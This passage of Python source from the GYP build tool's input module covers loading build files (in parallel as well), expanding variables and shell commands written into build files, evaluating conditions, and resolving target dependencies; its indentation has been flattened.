gyp.DEBUG_INCLUDES, "Loading Target Build File '%s'", build_file_path
)
build_file_data = LoadOneBuildFile(
build_file_path, data, aux_data, includes, True, check
)
# Store DEPTH for later use in generators.
build_file_data["_DEPTH"] = depth
# Set up the included_files key indicating which .gyp files contributed to
# this target dict.
if "included_files" in build_file_data:
raise GypError(build_file_path + " must not contain included_files key")
included = GetIncludedBuildFiles(build_file_path, aux_data)
build_file_data["included_files"] = []
for included_file in included:
# included_file is relative to the current directory, but it needs to
# be made relative to build_file_path's directory.
included_relative = gyp.common.RelativePath(
included_file, os.path.dirname(build_file_path)
)
build_file_data["included_files"].append(included_relative)
# Do a first round of toolsets expansion so that conditions can be defined
# per toolset.
ProcessToolsetsInDict(build_file_data)
# Apply "pre"/"early" variable expansions and condition evaluations.
ProcessVariablesAndConditionsInDict(
build_file_data, PHASE_EARLY, variables, build_file_path
)
# Since some toolsets might have been defined conditionally, perform
# a second round of toolsets expansion now.
ProcessToolsetsInDict(build_file_data)
# Look at each project's target_defaults dict, and merge settings into
# targets.
if "target_defaults" in build_file_data:
if "targets" not in build_file_data:
raise GypError("Unable to find targets in build file %s" % build_file_path)
index = 0
while index < len(build_file_data["targets"]):
# This procedure needs to give the impression that target_defaults is
# used as defaults, and the individual targets inherit from that.
# The individual targets need to be merged into the defaults. Make
# a deep copy of the defaults for each target, merge the target dict
# as found in the input file into that copy, and then hook up the
# copy with the target-specific data merged into it as the replacement
# target dict.
old_target_dict = build_file_data["targets"][index]
new_target_dict = gyp.simple_copy.deepcopy(
build_file_data["target_defaults"]
)
MergeDicts(
new_target_dict, old_target_dict, build_file_path, build_file_path
)
build_file_data["targets"][index] = new_target_dict
index += 1
# No longer needed.
del build_file_data["target_defaults"]
# Look for dependencies. This means that dependency resolution occurs
# after "pre" conditionals and variable expansion, but before "post" -
# in other words, you can't put a "dependencies" section inside a "post"
# conditional within a target.
dependencies = []
if "targets" in build_file_data:
for target_dict in build_file_data["targets"]:
if "dependencies" not in target_dict:
continue
for dependency in target_dict["dependencies"]:
dependencies.append(
gyp.common.ResolveTarget(build_file_path, dependency, None)[0]
)
if load_dependencies:
for dependency in dependencies:
try:
LoadTargetBuildFile(
dependency,
data,
aux_data,
variables,
includes,
depth,
check,
load_dependencies,
)
except Exception as e:
gyp.common.ExceptionAppend(
e, "while loading dependencies of %s" % build_file_path
)
raise
else:
return (build_file_path, dependencies)
def CallLoadTargetBuildFile(
global_flags,
build_file_path,
variables,
includes,
depth,
check,
generator_input_info,
):
"""Wrapper around LoadTargetBuildFile for parallel processing.
This wrapper is used when LoadTargetBuildFile is executed in
a worker process.
"""
try:
signal.signal(signal.SIGINT, signal.SIG_IGN)
# Apply globals so that the worker process behaves the same.
for key, value in global_flags.items():
globals()[key] = value
SetGeneratorGlobals(generator_input_info)
result = LoadTargetBuildFile(
build_file_path,
per_process_data,
per_process_aux_data,
variables,
includes,
depth,
check,
False,
)
if not result:
return result
(build_file_path, dependencies) = result
# We can safely pop the build_file_data from per_process_data because it
# will never be referenced by this process again, so we don't need to keep
# it in the cache.
build_file_data = per_process_data.pop(build_file_path)
# This gets serialized and sent back to the main process via a pipe.
# It's handled in LoadTargetBuildFileCallback.
return (build_file_path, build_file_data, dependencies)
except GypError as e:
sys.stderr.write("gyp: %s\n" % e)
return None
except Exception as e:
print("Exception:", e, file=sys.stderr)
print(traceback.format_exc(), file=sys.stderr)
return None
class ParallelProcessingError(Exception):
pass
class ParallelState(object):
"""Class to keep track of state when processing input files in parallel.
If build files are loaded in parallel, use this to keep track of
state during farming out and processing parallel jobs. It's stored
in a global so that the callback function can have access to it.
"""
def __init__(self):
# The multiprocessing pool.
self.pool = None
# The condition variable used to protect this object and notify
# the main loop when there might be more data to process.
self.condition = None
# The "data" dict that was passed to LoadTargetBuildFileParallel
self.data = None
# The number of parallel calls outstanding; decremented when a response
# was received.
self.pending = 0
# The set of all build files that have been scheduled, so we don't
# schedule the same one twice.
self.scheduled = set()
# A list of dependency build file paths that haven't been scheduled yet.
self.dependencies = []
# Flag to indicate if there was an error in a child process.
self.error = False
def LoadTargetBuildFileCallback(self, result):
"""Handle the results of running LoadTargetBuildFile in another process.
"""
self.condition.acquire()
if not result:
self.error = True
self.condition.notify()
self.condition.release()
return
(build_file_path0, build_file_data0, dependencies0) = result
self.data[build_file_path0] = build_file_data0
self.data["target_build_files"].add(build_file_path0)
for new_dependency in dependencies0:
if new_dependency not in self.scheduled:
self.scheduled.add(new_dependency)
self.dependencies.append(new_dependency)
self.pending -= 1
self.condition.notify()
self.condition.release()
def LoadTargetBuildFilesParallel(
build_files, data, variables, includes, depth, check, generator_input_info
):
parallel_state = ParallelState()
parallel_state.condition = threading.Condition()
# Make copies of the build_files argument that we can modify while working.
parallel_state.dependencies = list(build_files)
parallel_state.scheduled = set(build_files)
parallel_state.pending = 0
parallel_state.data = data
try:
parallel_state.condition.acquire()
while parallel_state.dependencies or parallel_state.pending:
if parallel_state.error:
break
if not parallel_state.dependencies:
parallel_state.condition.wait()
continue
dependency = parallel_state.dependencies.pop()
parallel_state.pending += 1
global_flags = {
"path_sections": globals()["path_sections"],
"non_configuration_keys": globals()["non_configuration_keys"],
"multiple_toolsets": globals()["multiple_toolsets"],
}
if not parallel_state.pool:
parallel_state.pool = multiprocessing.Pool(multiprocessing.cpu_count())
parallel_state.pool.apply_async(
CallLoadTargetBuildFile,
args=(
global_flags,
dependency,
variables,
includes,
depth,
check,
generator_input_info,
),
callback=parallel_state.LoadTargetBuildFileCallback,
)
except KeyboardInterrupt as e:
parallel_state.pool.terminate()
raise e
parallel_state.condition.release()
parallel_state.pool.close()
parallel_state.pool.join()
parallel_state.pool = None
if parallel_state.error:
sys.exit(1)
# Look for the bracket that matches the first bracket seen in a
# string, and return the start and end as a tuple. For example, if
# the input is something like "<(foo <(bar)) blah", then it would
# return (1, 13), indicating the entire string except for the leading
# "<" and trailing " blah".
LBRACKETS = set("{[(")
BRACKETS = {"}": "{", "]": "[", ")": "("}
def FindEnclosingBracketGroup(input_str):
stack = []
start = -1
for index, char in enumerate(input_str):
if char in LBRACKETS:
stack.append(char)
if start == -1:
start = index
elif char in BRACKETS:
if not stack:
return (-1, -1)
if stack.pop() != BRACKETS[char]:
return (-1, -1)
if not stack:
return (start, index + 1)
return (-1, -1)
def IsStrCanonicalInt(string):
"""Returns True if |string| is in its canonical integer form.
The canonical form is such that str(int(string)) == string.
"""
if type(string) is str:
# This function is called a lot so for maximum performance, avoid
# involving regexps which would otherwise make the code much
# shorter. Regexps would need twice the time of this function.
if string:
if string == "0":
return True
if string[0] == "-":
string = string[1:]
if not string:
return False
if "1" <= string[0] <= "9":
return string.isdigit()
return False
# This matches things like "<(asdf)", "<!(cmd)", "<!@(cmd)", "<|(list)",
# "<!interpreter(arguments)", "<([list])", and even "<([)" and "<(<())".
# In the last case, the inner "<()" is captured in match['content'].
early_variable_re = re.compile(
r"(?P<replace>(?P<type><(?:(?:!?@?)|\|)?)"
r"(?P<command_string>[-a-zA-Z0-9_.]+)?"
r"\((?P<is_array>\s*\[?)"
r"(?P<content>.*?)(\]?)\))"
)
# This matches the same as early_variable_re, but with '>' instead of '<'.
late_variable_re = re.compile(
r"(?P<replace>(?P<type>>(?:(?:!?@?)|\|)?)"
r"(?P<command_string>[-a-zA-Z0-9_.]+)?"
r"\((?P<is_array>\s*\[?)"
r"(?P<content>.*?)(\]?)\))"
)
# This matches the same as early_variable_re, but with '^' instead of '<'.
latelate_variable_re = re.compile(
r"(?P<replace>(?P<type>[\^](?:(?:!?@?)|\|)?)"
r"(?P<command_string>[-a-zA-Z0-9_.]+)?"
r"\((?P<is_array>\s*\[?)"
r"(?P<content>.*?)(\]?)\))"
)
# Global cache of results from running commands so they don't have to be run
# more then once.
cached_command_results = {}
def FixupPlatformCommand(cmd):
if sys.platform == "win32":
if type(cmd) is list:
cmd = [re.sub("^cat ", "type ", cmd[0])] + cmd[1:]
else:
cmd = re.sub("^cat ", "type ", cmd)
return cmd
PHASE_EARLY = 0
PHASE_LATE = 1
PHASE_LATELATE = 2
def ExpandVariables(input, phase, variables, build_file):
# Look for the pattern that gets expanded into variables
if phase == PHASE_EARLY:
variable_re = early_variable_re
expansion_symbol = "<"
elif phase == PHASE_LATE:
variable_re = late_variable_re
expansion_symbol = ">"
elif phase == PHASE_LATELATE:
variable_re = latelate_variable_re
expansion_symbol = "^"
else:
assert False
input_str = str(input)
if IsStrCanonicalInt(input_str):
return int(input_str)
# Do a quick scan to determine if an expensive regex search is warranted.
if expansion_symbol not in input_str:
return input_str
# Get the entire list of matches as a list of MatchObject instances.
# (using findall here would return strings instead of MatchObjects).
matches = list(variable_re.finditer(input_str))
if not matches:
return input_str
output = input_str
# Reverse the list of matches so that replacements are done right-to-left.
# That ensures that earlier replacements won't mess up the string in a
# way that causes later calls to find the earlier substituted text instead
# of what's intended for replacement.
matches.reverse()
for match_group in matches:
match = match_group.groupdict()
gyp.DebugOutput(gyp.DEBUG_VARIABLES, "Matches: %r", match)
# match['replace'] is the substring to look for, match['type']
# is the character code for the replacement type (< > <! >! <| >| <@
# >@ <!@ >!@), match['is_array'] contains a '[' for command
# arrays, and match['content'] is the name of the variable (< >)
# or command to run (<! >!). match['command_string'] is an optional
# command string. Currently, only 'pymod_do_main' is supported.
# run_command is true if a ! variant is used.
run_command = "!" in match["type"]
command_string = match["command_string"]
# file_list is true if a | variant is used.
file_list = "|" in match["type"]
# Capture these now so we can adjust them later.
replace_start = match_group.start("replace")
replace_end = match_group.end("replace")
# Find the ending paren, and re-evaluate the contained string.
(c_start, c_end) = FindEnclosingBracketGroup(input_str[replace_start:])
# Adjust the replacement range to match the entire command
# found by FindEnclosingBracketGroup (since the variable_re
# probably doesn't match the entire command if it contained
# nested variables).
replace_end = replace_start + c_end
# Find the "real" replacement, matching the appropriate closing
# paren, and adjust the replacement start and end.
replacement = input_str[replace_start:replace_end]
# Figure out what the contents of the variable parens are.
contents_start = replace_start + c_start + 1
contents_end = replace_end - 1
contents = input_str[contents_start:contents_end]
# Do filter substitution now for <|().
# Admittedly, this is different than the evaluation order in other
# contexts. However, since filtration has no chance to run on <|(),
# this seems like the only obvious way to give them access to filters.
if file_list:
processed_variables = gyp.simple_copy.deepcopy(variables)
ProcessListFiltersInDict(contents, processed_variables)
# Recurse to expand variables in the contents
contents = ExpandVariables(contents, phase, processed_variables, build_file)
else:
# Recurse to expand variables in the contents
contents = ExpandVariables(contents, phase, variables, build_file)
# Strip off leading/trailing whitespace so that variable matches are
# simpler below (and because they are rarely needed).
contents = contents.strip()
# expand_to_list is true if an @ variant is used. In that case,
# the expansion should result in a list. Note that the caller
# is to be expecting a list in return, and not all callers do
# because not all are working in list context. Also, for list
# expansions, there can be no other text besides the variable
# expansion in the input string.
expand_to_list = "@" in match["type"] and input_str == replacement
if run_command or file_list:
# Find the build file's directory, so commands can be run or file lists
# generated relative to it.
build_file_dir = os.path.dirname(build_file)
if build_file_dir == "" and not file_list:
# If build_file is just a leaf filename indicating a file in the
# current directory, build_file_dir might be an empty string. Set
# it to None to signal to subprocess.Popen that it should run the
# command in the current directory.
build_file_dir = None
# Support <|(listfile.txt ...) which generates a file
# containing items from a gyp list, generated at gyp time.
# This works around actions/rules which have more inputs than will
# fit on the command line.
if file_list:
if type(contents) is list:
contents_list = contents
else:
contents_list = contents.split(" ")
replacement = contents_list[0]
if os.path.isabs(replacement):
raise GypError('| cannot handle absolute paths, got "%s"' % replacement)
if not generator_filelist_paths:
path = os.path.join(build_file_dir, replacement)
else:
if os.path.isabs(build_file_dir):
toplevel = generator_filelist_paths["toplevel"]
rel_build_file_dir = gyp.common.RelativePath(
build_file_dir, toplevel
)
else:
rel_build_file_dir = build_file_dir
qualified_out_dir = generator_filelist_paths["qualified_out_dir"]
path = os.path.join(qualified_out_dir, rel_build_file_dir, replacement)
gyp.common.EnsureDirExists(path)
replacement = gyp.common.RelativePath(path, build_file_dir)
f = gyp.common.WriteOnDiff(path)
for i in contents_list[1:]:
f.write("%s\n" % i)
f.close()
elif run_command:
use_shell = True
if match["is_array"]:
contents = eval(contents)
use_shell = False
# Check for a cached value to avoid executing commands, or generating
# file lists more than once. The cache key contains the command to be
# run as well as the directory to run it from, to account for commands
# that depend on their current directory.
# TODO(http://code.google.com/p/gyp/issues/detail?id=111): In theory,
# someone could author a set of GYP files where each time the command
# is invoked it produces different output by design. When the need
# arises, the syntax should be extended to support no caching off a
# command's output so it is run every time.
cache_key = (str(contents), build_file_dir)
cached_value = cached_command_results.get(cache_key, None)
if cached_value is None:
gyp.DebugOutput(
gyp.DEBUG_VARIABLES,
"Executing command '%s' in directory '%s'",
contents,
build_file_dir,
)
replacement = ""
if command_string == "pymod_do_main":
# <!pymod_do_main(modulename param eters) loads |modulename| as a
# python module and then calls that module's DoMain() function,
# passing ["param", "eters"] as a single list argument. For modules
# that don't load quickly, this can be faster than
# <!(python modulename param eters). Do this in |build_file_dir|.
oldwd = os.getcwd() # Python doesn't like os.open('.'): no fchdir.
if build_file_dir: # build_file_dir may be None (see above).
os.chdir(build_file_dir)
sys.path.append(os.getcwd())
try:
parsed_contents = shlex.split(contents)
try:
py_module = __import__(parsed_contents[0])
except ImportError as e:
raise GypError(
"Error importing pymod_do_main"
"module (%s): %s" % (parsed_contents[0], e)
)
replacement = str(
py_module.DoMain(parsed_contents[1:])
).rstrip()
finally:
sys.path.pop()
os.chdir(oldwd)
assert replacement is not None
elif command_string:
raise GypError(
"Unknown command string '%s' in '%s'."
% (command_string, contents)
)
else:
# Fix up command with platform specific workarounds.
contents = FixupPlatformCommand(contents)
try:
p = subprocess.Popen(
contents,
shell=use_shell,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
stdin=subprocess.PIPE,
cwd=build_file_dir,
)
except Exception as e:
raise GypError(
"%s while executing command '%s' in %s"
% (e, contents, build_file)
)
p_stdout, p_stderr = p.communicate("")
if PY3:
p_stdout = p_stdout.decode("utf-8")
p_stderr = p_stderr.decode("utf-8")
if p.wait() != 0 or p_stderr:
sys.stderr.write(p_stderr)
# Simulate check_call behavior, since check_call only exists
# in python 2.5 and later.
raise GypError(
"Call to '%s' returned exit status %d while in %s."
% (contents, p.returncode, build_file)
)
replacement = p_stdout.rstrip()
cached_command_results[cache_key] = replacement
else:
gyp.DebugOutput(
gyp.DEBUG_VARIABLES,
"Had cache value for command '%s' in directory '%s'",
contents,
build_file_dir,
)
replacement = cached_value
else:
if contents not in variables:
if contents[-1] in ["!", "/"]:
# In order to allow cross-compiles (nacl) to happen more naturally,
# we will allow references to >(sources/) etc. to resolve to
# and empty list if undefined. This allows actions to:
# 'action!': [
# '>@(_sources!)',
# ],
# 'action/': [
# '>@(_sources/)',
# ],
replacement = []
else:
raise GypError(
"Undefined variable " + contents + " in " + build_file
)
else:
replacement = variables[contents]
if isinstance(replacement, bytes) and not isinstance(replacement, str):
replacement = replacement.decode("utf-8") # done on Python 3 only
if type(replacement) is list:
for item in replacement:
if isinstance(item, bytes) and not isinstance(item, str):
item = item.decode("utf-8") # done on Python 3 only
if not contents[-1] == "/" and type(item) not in (str, int):
raise GypError(
"Variable "
+ contents
+ " must expand to a string or list of strings; "
+ "list contains a "
+ item.__class__.__name__
)
# Run through the list and handle variable expansions in it. Since
# the list is guaranteed not to contain dicts, this won't do anything
# with conditions sections.
ProcessVariablesAndConditionsInList(
replacement, phase, variables, build_file
)
elif type(replacement) not in (str, int):
raise GypError(
"Variable "
+ contents
+ " must expand to a string or list of strings; "
+ "found a "
+ replacement.__class__.__name__
)
if expand_to_list:
# Expanding in list context. It's guaranteed that there's only one
# replacement to do in |input_str| and that it's this replacement. See
# above.
if type(replacement) is list:
# If it's already a list, make a copy.
output = replacement[:]
else:
# Split it the same way sh would split arguments.
output = shlex.split(str(replacement))
else:
# Expanding in string context.
encoded_replacement = ""
if type(replacement) is list:
# When expanding a list into string context, turn the list items
# into a string in a way that will work with a subprocess call.
#
# TODO(mark): This isn't completely correct. This should
# call a generator-provided function that observes the
# proper list-to-argument quoting rules on a specific
# platform instead of just calling the POSIX encoding
# routine.
encoded_replacement = gyp.common.EncodePOSIXShellList(replacement)
else:
encoded_replacement = replacement
output = (
output[:replace_start] + str(encoded_replacement) + output[replace_end:]
)
# Prepare for the next match iteration.
input_str = output
if output == input:
gyp.DebugOutput(
gyp.DEBUG_VARIABLES,
"Found only identity matches on %r, avoiding infinite " "recursion.",
output,
)
else:
# Look for more matches now that we've replaced some, to deal with
# expanding local variables (variables defined in the same
# variables block as this one).
gyp.DebugOutput(gyp.DEBUG_VARIABLES, "Found output %r, recursing.", output)
if type(output) is list:
if output and type(output[0]) is list:
# Leave output alone if it's a list of lists.
# We don't want such lists to be stringified.
pass
else:
new_output = []
for item in output:
new_output.append(
ExpandVariables(item, phase, variables, build_file)
)
output = new_output
else:
output = ExpandVariables(output, phase, variables, build_file)
# Convert all strings that are canonically-represented integers into integers.
if type(output) is list:
for index, outstr in enumerate(output):
if IsStrCanonicalInt(outstr):
output[index] = int(outstr)
elif IsStrCanonicalInt(output):
output = int(output)
return output
# The same condition is often evaluated over and over again so it
# makes sense to cache as much as possible between evaluations.
cached_conditions_asts = {}
def EvalCondition(condition, conditions_key, phase, variables, build_file):
"""Returns the dict that should be used or None if the result was
that nothing should be used."""
if type(condition) is not list:
raise GypError(conditions_key + " must be a list")
if len(condition) < 2:
# It's possible that condition[0] won't work in which case this
# attempt will raise its own IndexError. That's probably fine.
raise GypError(
conditions_key
+ " "
+ condition[0]
+ " must be at least length 2, not "
+ str(len(condition))
)
i = 0
result = None
while i < len(condition):
cond_expr = condition[i]
true_dict = condition[i + 1]
if type(true_dict) is not dict:
raise GypError(
"{} {} must be followed by a dictionary, not {}".format(
conditions_key, cond_expr, type(true_dict)
)
)
if len(condition) > i + 2 and type(condition[i + 2]) is dict:
false_dict = condition[i + 2]
i = i + 3
if i != len(condition):
raise GypError(
"{} {} has {} unexpected trailing items".format(
conditions_key, cond_expr, len(condition) - i
)
)
else:
false_dict = None
i = i + 2
if result is None:
result = EvalSingleCondition(
cond_expr, true_dict, false_dict, phase, variables, build_file
)
return result
def EvalSingleCondition(cond_expr, true_dict, false_dict, phase, variables, build_file):
"""Returns true_dict if cond_expr evaluates to true, and false_dict
otherwise."""
# Do expansions on the condition itself. Since the condition can naturally
# contain variable references without needing to resort to GYP expansion
# syntax, this is of dubious value for variables, but someone might want to
# use a command expansion directly inside a condition.
cond_expr_expanded = ExpandVariables(cond_expr, phase, variables, build_file)
if type(cond_expr_expanded) not in (str, int):
raise ValueError(
"Variable expansion in this context permits str and int "
+ "only, found "
+ cond_expr_expanded.__class__.__name__
)
try:
if cond_expr_expanded in cached_conditions_asts:
ast_code = cached_conditions_asts[cond_expr_expanded]
else:
ast_code = compile(cond_expr_expanded, "<string>", "eval")
cached_conditions_asts[cond_expr_expanded] = ast_code
env = {"__builtins__": {}, "v": StrictVersion}
if eval(ast_code, env, variables):
return true_dict
return false_dict
except SyntaxError as e:
syntax_error = SyntaxError(
"%s while evaluating condition '%s' in %s "
"at character %d." % (str(e.args[0]), e.text, build_file, e.offset),
e.filename,
e.lineno,
e.offset,
e.text,
)
raise syntax_error
except NameError as e:
gyp.common.ExceptionAppend(
e,
"while evaluating condition '%s' in %s" % (cond_expr_expanded, build_file),
)
raise GypError(e)
def ProcessConditionsInDict(the_dict, phase, variables, build_file):
# Process a 'conditions' or 'target_conditions' section in the_dict,
# depending on phase.
# early -> conditions
# late -> target_conditions
# latelate -> no conditions
#
# Each item in a conditions list consists of cond_expr, a string expression
# evaluated as the condition, and true_dict, a dict that will be merged into
# the_dict if cond_expr evaluates to true. Optionally, a third item,
# false_dict, may be present. false_dict is merged into the_dict if
# cond_expr evaluates to false.
#
# Any dict merged into the_dict will be recursively processed for nested
# conditionals and other expansions, also according to phase, immediately
# prior to being merged.
if phase == PHASE_EARLY:
conditions_key = "conditions"
elif phase == PHASE_LATE:
conditions_key = "target_conditions"
elif phase == PHASE_LATELATE:
return
else:
assert False
if conditions_key not in the_dict:
return
conditions_list = the_dict[conditions_key]
# Unhook the conditions list, it's no longer needed.
del the_dict[conditions_key]
for condition in conditions_list:
merge_dict = EvalCondition(
condition, conditions_key, phase, variables, build_file
)
if merge_dict is not None:
# Expand variables and nested conditinals in the merge_dict before
# merging it.
ProcessVariablesAndConditionsInDict(
merge_dict, phase, variables, build_file
)
MergeDicts(the_dict, merge_dict, build_file, build_file)
def LoadAutomaticVariablesFromDict(variables, the_dict):
# Any keys with plain string values in the_dict become automatic variables.
# The variable name is the key name with a "_" character prepended.
for key, value in the_dict.items():
if type(value) in (str, int, list):
variables["_" + key] = value
def LoadVariablesFromVariablesDict(variables, the_dict, the_dict_key):
# Any keys in the_dict's "variables" dict, if it has one, becomes a
# variable. The variable name is the key name in the "variables" dict.
# Variables that end with the % character are set only if they are unset in
# the variables dict. the_dict_key is the name of the key that accesses
# the_dict in the_dict's parent dict. If the_dict's parent is not a dict
# (it could be a list or it could be parentless because it is a root dict),
# the_dict_key will be None.
for key, value in the_dict.get("variables", {}).items():
if type(value) not in (str, int, list):
continue
if key.endswith("%"):
variable_name = key[:-1]
if variable_name in variables:
# If the variable is already set, don't set it.
continue
if the_dict_key == "variables" and variable_name in the_dict:
# If the variable is set without a % in the_dict, and the_dict is a
# variables dict (making |variables| a variables sub-dict of a
# variables dict), use the_dict's definition.
value = the_dict[variable_name]
else:
variable_name = key
variables[variable_name] = value
def ProcessVariablesAndConditionsInDict(
the_dict, phase, variables_in, build_file, the_dict_key=None
):
"""Handle all variable and command expansion and conditional evaluation.
This function is the public entry point for all variable expansions and
conditional evaluations. The variables_in dictionary will not be modified
by this function.
"""
# Make a copy of the variables_in dict that can be modified during the
# loading of automatics and the loading of the variables dict.
variables = variables_in.copy()
LoadAutomaticVariablesFromDict(variables, the_dict)
if "variables" in the_dict:
# Make sure all the local variables are added to the variables
# list before we process them so that you can reference one
# variable from another. They will be fully expanded by recursion
# in ExpandVariables.
for key, value in the_dict["variables"].items():
variables[key] = value
# Handle the associated variables dict first, so that any variable
# references within can be resolved prior to using them as variables.
# Pass a copy of the variables dict to avoid having it be tainted.
# Otherwise, it would have extra automatics added for everything that
# should just be an ordinary variable in this scope.
ProcessVariablesAndConditionsInDict(
the_dict["variables"], phase, variables, build_file, "variables"
)
LoadVariablesFromVariablesDict(variables, the_dict, the_dict_key)
for key, value in the_dict.items():
# Skip "variables", which was already processed if present.
if key != "variables" and type(value) is str:
expanded = ExpandVariables(value, phase, variables, build_file)
if type(expanded) not in (str, int):
raise ValueError(
"Variable expansion in this context permits str and int "
+ "only, found "
+ expanded.__class__.__name__
+ " for "
+ key
)
the_dict[key] = expanded
# Variable expansion may have resulted in changes to automatics. Reload.
# TODO(mark): Optimization: only reload if no changes were made.
variables = variables_in.copy()
LoadAutomaticVariablesFromDict(variables, the_dict)
LoadVariablesFromVariablesDict(variables, the_dict, the_dict_key)
# Process conditions in this dict. This is done after variable expansion
# so that conditions may take advantage of expanded variables. For example,
# if the_dict contains:
# {'type': '<(library_type)',
# 'conditions': [['_type=="static_library"', { ... }]]},
# _type, as used in the condition, will only be set to the value of
# library_type if variable expansion is performed before condition
# processing. However, condition processing should occur prior to recursion
# so that variables (both automatic and "variables" dict type) may be
# adjusted by conditions sections, merged into the_dict, and have the
# intended impact on contained dicts.
#
# This arrangement means that a "conditions" section containing a "variables"
# section will only have those variables effective in subdicts, not in
# the_dict. The workaround is to put a "conditions" section within a
# "variables" section. For example:
# {'conditions': [['os=="mac"', {'variables': {'define': 'IS_MAC'}}]],
# 'defines': ['<(define)'],
# 'my_subdict': {'defines': ['<(define)']}},
# will not result in "IS_MAC" being appended to the "defines" list in the
# current scope but would result in it being appended to the "defines" list
# within "my_subdict". By comparison:
# {'variables': {'conditions': [['os=="mac"', {'define': 'IS_MAC'}]]},
# 'defines': ['<(define)'],
# 'my_subdict': {'defines': ['<(define)']}},
# will append "IS_MAC" to both "defines" lists.
# Evaluate conditions sections, allowing variable expansions within them
# as well as nested conditionals. This will process a 'conditions' or
# 'target_conditions' section, perform appropriate merging and recursive
# conditional and variable processing, and then remove the conditions section
# from the_dict if it is present.
ProcessConditionsInDict(the_dict, phase, variables, build_file)
# Conditional processing may have resulted in changes to automatics or the
# variables dict. Reload.
variables = variables_in.copy()
LoadAutomaticVariablesFromDict(variables, the_dict)
LoadVariablesFromVariablesDict(variables, the_dict, the_dict_key)
# Recurse into child dicts, or process child lists which may result in
# further recursion into descendant dicts.
for key, value in the_dict.items():
# Skip "variables" and string values, which were already processed if
# present.
if key == "variables" or type(value) is str:
continue
if type(value) is dict:
# Pass a copy of the variables dict so that subdicts can't influence
# parents.
ProcessVariablesAndConditionsInDict(
value, phase, variables, build_file, key
)
elif type(value) is list:
# The list itself can't influence the variables dict, and
# ProcessVariablesAndConditionsInList will make copies of the variables
# dict if it needs to pass it to something that can influence it. No
# copy is necessary here.
ProcessVariablesAndConditionsInList(value, phase, variables, build_file)
elif type(value) is not int:
raise TypeError("Unknown type " + value.__class__.__name__ + " for " + key)
def ProcessVariablesAndConditionsInList(the_list, phase, variables, build_file):
# Iterate using an index so that new values can be assigned into the_list.
index = 0
while index < len(the_list):
item = the_list[index]
if type(item) is dict:
# Make a copy of the variables dict so that it won't influence anything
# outside of its own scope.
ProcessVariablesAndConditionsInDict(item, phase, variables, build_file)
elif type(item) is list:
ProcessVariablesAndConditionsInList(item, phase, variables, build_file)
elif type(item) is str:
expanded = ExpandVariables(item, phase, variables, build_file)
if type(expanded) in (str, int):
the_list[index] = expanded
elif type(expanded) is list:
the_list[index : index + 1] = expanded
index += len(expanded)
# index now identifies the next item to examine. Continue right now
# without falling into the index increment below.
continue
else:
raise ValueError(
"Variable expansion in this context permits strings and "
+ "lists only, found "
+ expanded.__class__.__name__
+ " at "
+ index
)
elif type(item) is not int:
raise TypeError(
"Unknown type " + item.__class__.__name__ + " at index " + index
)
index = index + 1
def BuildTargetsDict(data):
"""Builds a dict mapping fully-qualified target names to their target dicts.
|data| is a dict mapping loaded build files by pathname relative to the
current directory. Values in |data| are build file contents. For each
|data| value with a "targets" key, the value of the "targets" key is taken
as a list containing target dicts. Each target's fully-qualified name is
constructed from the pathname of the build file (|data| key) and its
"target_name" property. These fully-qualified names are used as the keys
in the returned dict. These keys provide access to the target dicts,
the dicts in the "targets" lists.
"""
targets = {}
for build_file in data["target_build_files"]:
for target in data[build_file].get("targets", []):
target_name = gyp.common.QualifiedTarget(
build_file, target["target_name"], target["toolset"]
)
if target_name in targets:
raise GypError("Duplicate target definitions for " + target_name)
targets[target_name] = target
return targets
def QualifyDependencies(targets):
"""Make dependency links fully-qualified relative to the current directory.
|targets| is a dict mapping fully-qualified target names to their target
dicts. For each target in this dict, keys known to contain dependency
links are examined, and any dependencies referenced will be rewritten
so that they are fully-qualified and relative to the current directory.
All rewritten dependencies are suitable for use as keys to |targets| or a
similar dict.
"""
all_dependency_sections = [
dep + op for dep in dependency_sections for op in ("", "!", "/")
]
for target, target_dict in targets.items():
target_build_file = gyp.common.BuildFile(target)
toolset = target_dict["toolset"]
for dependency_key in all_dependency_sections:
dependencies = target_dict.get(dependency_key, [])
for index, dep in enumerate(dependencies):
dep_file, dep_target, dep_toolset = gyp.common.ResolveTarget(
target_build_file, dep, toolset
)
if not multiple_toolsets:
# Ignore toolset specification in the dependency if it is specified.
dep_toolset = toolset
dependency = gyp.common.QualifiedTarget(
dep_file, dep_target, dep_toolset
)
dependencies[index] = dependency
# Make sure anything appearing in a list other than "dependencies" also
# appears in the "dependencies" list.
if (
dependency_key != "dependencies"
and dependency not in target_dict["dependencies"]
):
raise GypError(
"Found "
+ dependency
+ " in "
+ dependency_key
+ " of "
+ target
+ ", but not in dependencies"
)
def ExpandWildcardDependencies(targets, data):
"""Expands dependencies specified as build_file:*.
For each target in |targets|, examines sections containing links to other
targets. If any such section contains a link of the form build_file:*, it
is taken as a wildcard link, and is expanded to list each target in
build_file. The |data| dict provides access to build file dicts.
Any target that does not wish to be included by wildcard can provide an
optional "suppress_wildcard" key in its target dict. When present and
true, a wildcard dependency link will not include such targets.
All dependency names, including the keys to |targets| and the values in each
dependency list, must be qualified when this function is called.
"""
for target, target_dict in targets.items():
target_build_file = gyp.common.BuildFile(target)
for dependency_key in dependency_sections:
dependencies = target_dict.get(dependency_key, [])
# Loop this way instead of "for dependency in" or "for index in range"
# because the dependencies list will be modified within the loop body.
index = 0
while index < len(dependencies):
(
dependency_build_file,
dependency_target,
dependency_toolset,
) = gyp.common.ParseQualifiedTarget(dependencies[index])
if dependency_target != "*" and dependency_toolset != "*":
# Not a wildcard. Keep it moving.
index = index + 1
continue
if dependency_build_file == target_build_file:
# It's an error for a target to depend on all other targets in
# the same file, because a target cannot depend on itself.
raise GypError(
"Found wildcard in "
+ dependency_key
+ " of "
+ target
+ " referring to same build file"
)
# Take the wildcard out and adjust the index so that the next
# dependency in the list will be processed the next time through the
# loop.
del dependencies[index]
index = index - 1
# Loop through the targets in the other build file, adding them to
# this target's list of dependencies in place of the removed
# wildcard.
dependency_target_dicts = data[dependency_build_file]["targets"]
for dependency_target_dict in dependency_target_dicts:
if int(dependency_target_dict.get("suppress_wildcard", False)):
continue
dependency_target_name = dependency_target_dict["target_name"]
if (
dependency_target != "*"
and dependency_target != dependency_target_name
):
continue
dependency_target_toolset = dependency_target_dict["toolset"]
if (
dependency_toolset != "*"
and dependency_toolset != dependency_target_toolset
):
continue
dependency = gyp.common.QualifiedTarget(
dependency_build_file,
dependency_target_name,
dependency_target_toolset,
)
index = index + 1
dependencies.insert(index, dependency)
index = index + 1
def Unify(l):
"""Removes duplicate elements from l, keeping the first element."""
seen = {}
